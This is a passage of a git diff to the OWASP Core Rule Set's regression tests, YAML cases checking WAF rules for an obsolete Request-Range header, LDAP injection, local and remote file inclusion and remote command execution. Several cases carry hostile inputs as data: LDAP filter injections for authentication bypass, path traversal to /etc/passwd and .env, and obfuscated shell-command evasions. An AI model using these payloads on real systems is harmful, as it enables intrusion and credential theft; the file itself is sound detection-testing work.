dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/video.mp4" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Request-Range: "bytes=1024-" + output: + log: + expect_ids: [920660] + + - test_id: 3 + desc: "Request-Range header with suffix range" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/audio.mp3" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Request-Range: "bytes=-500" + output: + log: + expect_ids: [920660] + + - test_id: 4 + desc: "Request-Range header with multiple ranges" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/file.bin" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Request-Range: "bytes=0-100,200-300,400-500" + output: + log: + expect_ids: [920660] + + # Case variations (HTTP headers are case-insensitive) + - test_id: 5 + desc: "Request-Range header with mixed case" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/download.zip" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + request-range: "bytes=0-1023" + output: + log: + expect_ids: [920660] + + - test_id: 6 + desc: "REQUEST-RANGE header in uppercase" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/large-file.iso" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + REQUEST-RANGE: "bytes=1000-2000" + output: + log: + expect_ids: [920660] + + # Different HTTP methods + - test_id: 7 + desc: "Request-Range in POST request" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/upload" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Request-Range: "bytes=0-512" + Content-Type: "application/x-www-form-urlencoded" + data: "action=resume" + output: + log: + expect_ids: [920660] + + - test_id: 8 + desc: "Request-Range in HEAD request" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "HEAD" + uri: "/document.pdf" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Request-Range: "bytes=0-0" + output: + log: + expect_ids: [920660] + + - test_id: 9 + desc: "Request-Range in PUT request" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "PUT" + uri: "/upload/file.dat" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Request-Range: "bytes=1024-2047" + Content-Type: "application/octet-stream" + data: "binary-data-here" + output: + log: + expect_ids: [920660] + + # Edge cases for header values + - test_id: 10 + desc: "Request-Range with whitespace in value" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/data.bin" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Request-Range: " bytes=0-1023 " + output: + log: + expect_ids: [920660] + + - test_id: 11 + desc: "Request-Range with large range values" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/bigfile.iso" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Request-Range: "bytes=1073741824-2147483647" + output: + log: + expect_ids: [920660] + + - test_id: 12 + desc: "Request-Range with zero range" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/tiny.txt" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Request-Range: "bytes=0-0" + output: + log: + expect_ids: [920660] + + # Simulating old browser behavior (Netscape 2-3, MSIE 3) + - test_id: 13 + desc: "Request-Range with old Netscape user agent" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/download.exe" + headers: + User-Agent: "Mozilla/3.0 (Win95; I)" + Host: "localhost" + Accept: "*/*" + Request-Range: "bytes=0-8191" + output: + log: + expect_ids: [920660] + + - test_id: 14 + desc: "Request-Range with old MSIE user agent" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/update.cab" + headers: + User-Agent: "Mozilla/2.0 (compatible; MSIE 3.0; Windows 95)" + Host: "localhost" + Accept: "*/*" + Request-Range: "bytes=16384-32767" + output: + log: + expect_ids: [920660] + + # Malformed but present header + - test_id: 15 + desc: "Request-Range with invalid syntax (still triggers as header exists)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/resource" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Request-Range: "invalid-range-spec" + output: + log: + expect_ids: [920660] + + - test_id: 16 + desc: "Request-Range with empty value (header still present)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/test.html" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Request-Range: "" + output: + log: + expect_ids: [920660] + + # Request-Range alongside standard Range header + - test_id: 17 + desc: "Both Request-Range and Range headers present" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/media.mp4" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Range: "bytes=0-1023" + Request-Range: "bytes=0-1023" + output: + log: + expect_ids: [920660] + + # + # Negative tests - should NOT trigger + # + + # Normal requests with standard Range header (RFC 9110 compliant) + - test_id: 18 + desc: "Negative - Standard Range header (RFC 9110)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/video.mp4" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Range: "bytes=0-1023" + output: + log: + no_expect_ids: [920660] + + - test_id: 19 + desc: "Negative - Range header with multiple ranges" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/document.pdf" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Range: "bytes=0-100,200-300" + output: + log: + no_expect_ids: [920660] + + - test_id: 20 + desc: "Negative - Normal GET request without Range headers" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/index.html" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920660] + + - test_id: 21 + desc: "Negative - POST request without Range headers" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/data" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Content-Type: "application/x-www-form-urlencoded" + data: "name=test&value=123" + output: + log: + no_expect_ids: [920660] + + # Other headers with similar names + - test_id: 22 + desc: "Negative - If-Range header (conditional range request)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/large.bin" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Range: "bytes=1024-2047" + If-Range: "Wed, 21 Oct 2015 07:28:00 GMT" + output: + log: + no_expect_ids: [920660] + + - test_id: 23 + desc: "Negative - Content-Range header in response (should not trigger)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/data.zip" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Content-Range: "bytes 0-1023/4096" + output: + log: + no_expect_ids: [920660] + + - test_id: 24 + desc: "Negative - Accept-Ranges in request (unusual but not Request-Range)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "OPTIONS" + uri: "/resource" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Accept-Ranges: "bytes" + output: + log: + no_expect_ids: [920660] + + # Modern browsers and clients + - test_id: 25 + desc: "Negative - Modern Chrome with standard Range header" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/stream.webm" + headers: + User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" + Host: "localhost" + Accept: "*/*" + Range: "bytes=0-" + output: + log: + no_expect_ids: [920660] + + - test_id: 26 + desc: "Negative - Modern Firefox with standard Range header" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/music.ogg" + headers: + User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" + Host: "localhost" + Accept: "*/*" + Range: "bytes=8192-16383" + output: + log: + no_expect_ids: [920660] + + # Edge cases + - test_id: 27 + desc: "Negative - Query parameter named request_range" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/api/download?request_range=0-1023" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920660] + + - test_id: 28 + desc: "Negative - POST body containing 'Request-Range' text" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/logs" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Content-Type: "application/x-www-form-urlencoded" + data: "log=Request-Range%3A+bytes%3D0-1023" + output: + log: + no_expect_ids: [920660] + + - test_id: 29 + desc: "Negative - Custom header X-Request-Range" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/download" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + X-Request-Range: "bytes=0-1023" + output: + log: + no_expect_ids: [920660] + + - test_id: 30 + desc: "Negative - HEAD request without any range headers" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "HEAD" + uri: "/file.bin" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920660] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml index dc397acbf2..3163477f89 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml @@ -4,8 +4,13 @@ meta: description: "LDAP injection" rule_id: 921200 tests: + # + # === Negative Tests (should NOT trigger rule 921200) === + # + + # --- Existing FP tests from original file --- - test_id: 1 - desc: "Testing for FP, this should not trigger" + desc: "False positive: LDAP filter with objectCategory and userAccountControl attributes, valid query" stages: - input: dest_addr: "127.0.0.1" @@ -17,12 +22,13 @@ tests: method: POST data: "foo=(%26(objectCategory=computer) (userAccountControl:1.2.840.113556.1.4.803:=8192))" uri: "/" - version: "HTTP/1.1" output: log: - no_expect_ids: [921200] + no_expect_ids: + - 921200 + - test_id: 2 - desc: "Testing for FP, this should not trigger" + desc: "False positive: LDAP filter with objectSID, valid SID format" stages: - input: dest_addr: "127.0.0.1" @@ -34,12 +40,13 @@ tests: method: POST data: "foo=(objectSID=S-1-5-21-73586283-152049171-839522115-1111)" uri: "/" - version: "HTTP/1.1" output: log: - no_expect_ids: [921200] + no_expect_ids: + - 921200 + - test_id: 3 - desc: "Testing for FP, this should not trigger" + desc: "False positive: LDAP filter with userAccountControl and groupType, valid group query" stages: - input: dest_addr: "127.0.0.1" @@ -51,12 +58,173 @@ tests: method: POST data: "foo=(userAccountControl:1.2.840.113556.1.4.803:=67108864)(%26(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=2147483648))" uri: "/" - version: "HTTP/1.1" output: log: - no_expect_ids: [921200] + no_expect_ids: + - 921200 + + # --- Additional FP tests --- - test_id: 4 - desc: "Testing for rule, this should trigger" + desc: "False positive: Simple alphanumeric query parameter, no LDAP syntax" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?username=johndoe" + output: + log: + no_expect_ids: + - 921200 + + - test_id: 5 + desc: "False positive: Parentheses in mathematical expression, not LDAP related" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?formula=(a+b)*c" + output: + log: + no_expect_ids: + - 921200 + + - test_id: 6 + desc: "False positive: Email address in query parameter, standard format" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?email=user@example.com" + output: + log: + no_expect_ids: + - 921200 + + - test_id: 7 + desc: "False positive: Standard URL query parameters with ampersand, no LDAP syntax" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?a=1&b=2&c=3" + output: + log: + no_expect_ids: + - 921200 + + - test_id: 8 + desc: "False positive: Pipe character in search term, not LDAP syntax" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?search=foo|bar" + output: + log: + no_expect_ids: + - 921200 + + - test_id: 9 + desc: "False positive: Balanced parentheses in arithmetic expression" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?expr=(1+2)+(3+4)" + output: + log: + no_expect_ids: + - 921200 + + - test_id: 10 + desc: "False positive: Exclamation mark in text, not LDAP related" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?message=Hello!World" + output: + log: + no_expect_ids: + - 921200 + + - test_id: 11 + desc: "False positive: Tilde in file path, standard Unix path" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/~user/file.txt" + output: + log: + no_expect_ids: + - 921200 + + - test_id: 12 + desc: "False positive: Colon in time format, not LDAP syntax" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?time=12:30:45" + output: + log: + no_expect_ids: + - 921200 + + # + # === Positive Tests (should trigger rule 921200) === + # + + # --- Existing positive tests from original file --- + # Pattern: )( with boolean operator + - test_id: 13 + desc: "LDAP injection: close parenthesis followed by encoded AND operator, classic injection pattern" stages: - input: dest_addr: "127.0.0.1" @@ -68,12 +236,14 @@ tests: data: "foo=bar)(%26)" uri: "/" port: 80 - version: "HTTP/1.1" output: log: - expect_ids: [921200] - - test_id: 5 - desc: "Testing for rule, this should trigger" + expect_ids: + - 921200 + + # Pattern: )(attr=* + - test_id: 14 + desc: "LDAP injection: close parenthesis followed by uid wildcard filter, filter manipulation" stages: - input: dest_addr: "127.0.0.1" @@ -85,12 +255,14 @@ tests: data: "foo=printer)(uid=*)" uri: "/" port: 80 - version: "HTTP/1.1" output: log: - expect_ids: [921200] - - test_id: 6 - desc: "Testing for rule, this should trigger" + expect_ids: + - 921200 + + # Pattern: complex injection with multiple filters + - test_id: 15 + desc: "LDAP injection: complex filter manipulation using objectClass, multiple filters" stages: - input: dest_addr: "127.0.0.1" @@ -102,12 +274,14 @@ tests: data: "foo=void)(objectClass=users))(%26(objectClass=void)" uri: "/" port: 80 - version: "HTTP/1.1" output: log: - expect_ids: [921200] - - test_id: 7 - desc: "Testing for rule, this should trigger" + expect_ids: + - 921200 + + # Pattern: )!(attr=* + - test_id: 16 + desc: "LDAP injection: NOT operator with sn wildcard, filter negation" stages: - input: dest_addr: "127.0.0.1" @@ -119,12 +293,14 @@ tests: data: "foo=eb9adbd87d)!(sn=*" uri: "/" port: 80 - version: "HTTP/1.1" output: log: - expect_ids: [921200] - - test_id: 8 - desc: "Testing for rule, this should trigger" + expect_ids: + - 921200 + + # Pattern: *)!(attr=* + - test_id: 17 + desc: "LDAP injection: wildcard value followed by NOT operator, filter negation" stages: - input: dest_addr: "127.0.0.1" @@ -136,12 +312,14 @@ tests: data: "foo=*)!(sn=*" uri: "/" port: 80 - version: "HTTP/1.1" output: log: - expect_ids: [921200] - - test_id: 9 - desc: "Testing for rule, this should trigger" + expect_ids: + - 921200 + + # Pattern: )(uid=*))(|(uid=* + - test_id: 18 + desc: "LDAP injection: complex OR injection with multiple uid filters, chaining filters" stages: - input: dest_addr: "127.0.0.1" @@ -153,12 +331,14 @@ tests: data: "foo=*)(uid=*))(|(uid=*" uri: "/" port: 80 - version: "HTTP/1.1" output: log: - expect_ids: [921200] - - test_id: 10 - desc: "Testing for rule, this should trigger" + expect_ids: + - 921200 + + # Pattern: )(cn>=value - greater-than-equals comparison + - test_id: 19 + desc: "LDAP injection: greater-than-equals comparison operator in filter, privilege escalation attempt" stages: - input: dest_addr: "127.0.0.1" @@ -170,7 +350,210 @@ tests: data: "foo=aaa*aaa)(cn>=bob)" uri: "/" port: 80 - version: "HTTP/1.1" output: log: - expect_ids: [921200] + expect_ids: + - 921200 + + # --- Additional positive tests for better coverage --- + + # Pattern: )(attr<= - less-than-equals comparison + - test_id: 20 + desc: "LDAP injection: less-than-equals comparison operator in filter, privilege restriction attempt" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?filter=value)(gidNumber%3C%3D100" + output: + log: + expect_ids: + - 921200 + + # Pattern: )(attr~= - approximate match + - test_id: 21 + desc: "LDAP injection: approximate match operator in filter, fuzzy search manipulation" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?name=john)(sn~%3Dsmith" + output: + log: + expect_ids: + - 921200 + + # Pattern: )(| - OR operator injection + - test_id: 22 + desc: "LDAP injection: OR operator injection, filter chaining for bypass" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?user=admin)(|" + output: + log: + expect_ids: + - 921200 + + # Pattern: ))((& - double close-open with AND + - test_id: 23 + desc: "LDAP injection: double parenthesis escape with AND operator, advanced filter manipulation" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?q=test))(%26(objectClass%3D*" + output: + log: + expect_ids: + - 921200 + + # Pattern: &(attr= - direct AND with new filter + - test_id: 24 + desc: "LDAP injection: AND operator with new filter attribute, filter expansion" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?param=val)%26(cn%3Dadmin" + output: + log: + expect_ids: + - 921200 + + # Pattern: |(attr= - direct OR with new filter + - test_id: 25 + desc: "LDAP injection: OR operator with new filter attribute, filter expansion" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?param=val)%7C(uid%3D*" + output: + log: + expect_ids: + - 921200 + + # Real-world attack: Joomla CVE-2017-14596 + - test_id: 26 + desc: "LDAP injection: Joomla CVE-2017-14596 style attack, OR operator with password wildcard" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?username=admin)(%7C(password%3D*" + output: + log: + expect_ids: + - 921200 + + # Cookie-based injection + - test_id: 27 + desc: "LDAP injection: attack via cookie value, filter manipulation in session" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Cookie: "session=value)(uid=*" + method: "GET" + port: 80 + uri: "/" + output: + log: + expect_ids: + - 921200 + + # Whitespace evasion with URL encoding + - test_id: 28 + desc: "LDAP injection: whitespace evasion using URL-encoded spaces between filters" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?q=test)%20(%20%26%20" + output: + log: + expect_ids: + - 921200 + + # Tab character evasion + - test_id: 29 + desc: "LDAP injection: tab character as whitespace evasion between filters" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?q=test)%09(%09|" + output: + log: + expect_ids: + - 921200 + + # Authentication bypass attempt + - test_id: 30 + desc: "LDAP injection: authentication bypass attempt via POST, AND operator with objectClass wildcard" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + port: 80 + uri: "/login" + data: "username=admin)(%26(objectClass%3D*)&password=anything" + output: + log: + expect_ids: + - 921200 diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml index 80eb80460e..db273a28ef 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml @@ -1,6 +1,6 @@ --- meta: - author: "Andrew Howe, azurit, Esad Cetiner" + author: "Andrew Howe, azurit, Esad Cetiner, Roberto Di Sisto, touchweb_vincent" rule_id: 930130 tests: - test_id: 1 @@ -53,3 +53,99 @@ tests: output: log: expect_ids: [930130] + - test_id: 4 + desc: "Vite.js /@fs/ path traversal (CVE-2025-30208)" + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + uri: "/@fs/etc/passwd" + version: "HTTP/1.1" + output: + log: + expect_ids: [930130] + - test_id: 5 + desc: "Vite.js /@fs/ path traversal - .env file" + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + uri: "/@fs/.env" + version: "HTTP/1.1" + output: + log: + expect_ids: [930130] + - test_id: 6 + desc: "Vite.js /@id/ module exploit" + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + uri: "/@id/__x00__?import" + version: "HTTP/1.1" + output: + log: + expect_ids: [930130] + - test_id: 7 + desc: "Unauthorized attempt to access wp-content/debug.log" + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + uri: "/wp-content/debug.log" + version: "HTTP/1.1" + output: + log: + expect_ids: [930130] + - test_id: 8 + desc: "Unauthorized attempt to access wp-content/error.log" + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + uri: "/wp-content/error.log" + version: "HTTP/1.1" + output: + log: + expect_ids: [930130] + - test_id: 9 + desc: "Unauthorized attempt to access wp-content/errors.log" + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + uri: "/wp-content/errors.log" + version: "HTTP/1.1" + output: + log: + expect_ids: [930130] diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml index 76c23d6eb8..858b3b6c62 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml @@ -1,6 +1,6 @@ --- meta: - author: "emphazer, azurit" + author: "emphazer, azurit, touchweb_vincent" rule_id: 931131 tests: - test_id: 1 @@ -19,3 +19,19 @@ tests: output: log: expect_ids: [931131] + - test_id: 2 + desc: Remote File Inclusion Attack (931131) with same origin domain on REQUEST_FILENAME + stages: + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/https://example.com/" + version: HTTP/1.1 + output: + log: + expect_ids: [931131] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml index 395e5fa7da..4c5f07db49 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml @@ -5,23 +5,6 @@ meta: rule_id: 932220 tests: - test_id: 1 - desc: "TEST=echo | php7.4" - stages: - - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "TEST=echo | gcc7.4" - version: HTTP/1.1 - output: - log: - expect_ids: [932220] - - test_id: 2 desc: "TEST=echo | ${gcc7.4}gcc7.4" stages: - input: @@ -38,7 +21,7 @@ tests: output: log: expect_ids: [932220] - - test_id: 3 + - test_id: 2 desc: "whxami|sh+``" stages: - input: @@ -55,7 +38,7 @@ tests: output: log: expect_ids: [932220] - - test_id: 4 + - test_id: 3 desc: | Test for BB finding 9P5LL13Y echo "foo;whxam"i | tr x o | sh #" @@ -75,7 +58,7 @@ tests: output: log: expect_ids: [932220] - - test_id: 5 + - test_id: 4 desc: "Block evasion using here string" stages: - input: @@ -93,7 +76,7 @@ tests: output: log: expect_ids: [932220] - - test_id: 6 + - test_id: 5 desc: "Block evasion using here string with space" stages: - input: @@ -111,7 +94,7 @@ tests: output: log: expect_ids: [932220] - - test_id: 7 + - test_id: 6 desc: "Block evasion using here string with single quotes" stages: - input: @@ -129,7 +112,7 @@ tests: output: log: expect_ids: [932220] - - test_id: 8 + - test_id: 7 desc: "Block evasion using here string with double quotes" stages: - input: @@ -147,7 +130,7 @@ tests: output: log: expect_ids: [932220] - - test_id: 9 + - test_id: 8 desc: "Block evasion using here string with command substitution" stages: - input: @@ -165,7 +148,7 @@ tests: output: log: expect_ids: [932220] - - test_id: 10 + - test_id: 9 desc: "Block `time` prefix" stages: - input: @@ -183,7 +166,7 @@ tests: output: log: expect_ids: [932220] - - test_id: 11 + - test_id: 10 desc: "Block `strace` prefix" stages: - input: @@ -201,7 +184,7 @@ tests: output: log: expect_ids: [932220] - - test_id: 12 + - test_id: 11 desc: "Block `nohup` prefix" stages: - input: diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml index fa2864d9a3..4cec131e89 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml @@ -1113,7 +1113,7 @@ tests: User-Agent: "OWASP CRS test agent" Host: "localhost" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,ima> - data: "arg=;rmt" + data: "arg=;rmt%20--version" version: "HTTP/1.1" output: log: diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml index e3398ec36a..93c03688b7 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml @@ -5,23 +5,6 @@ meta: rule_id: 932232 tests: - test_id: 1 - desc: "/?arg=;ps" - stages: - - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=%3Bps" - version: HTTP/1.1 - output: - log: - expect_ids: [932232] - - test_id: 2 desc: "/?arg=|vi (x" stages: - input: @@ -38,7 +21,7 @@ tests: output: log: expect_ids: [932232] - - test_id: 3 + - test_id: 2 desc: "/?arg=&w (x" stages: - input: @@ -55,24 +38,7 @@ tests: output: log: expect_ids: [932232] - - test_id: 4 - desc: "/?arg=&aptitude" - stages: - - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=%26aptitude" - version: HTTP/1.1 - output: - log: - expect_ids: [932232] - - test_id: 5 + - test_id: 3 desc: Remote Command Execution bypass with time stages: - input: @@ -90,7 +56,7 @@ tests: output: log: expect_ids: [932232] - - test_id: 6 + - test_id: 4 desc: Remote Command Execution bypass with time negative test stages: - input: @@ -108,7 +74,7 @@ tests: output: log: no_expect_ids: [932232] - - test_id: 7 + - test_id: 5 desc: Remote Command Injection test for BB finding 935E1D91 - time evasion attempt stages: - input: 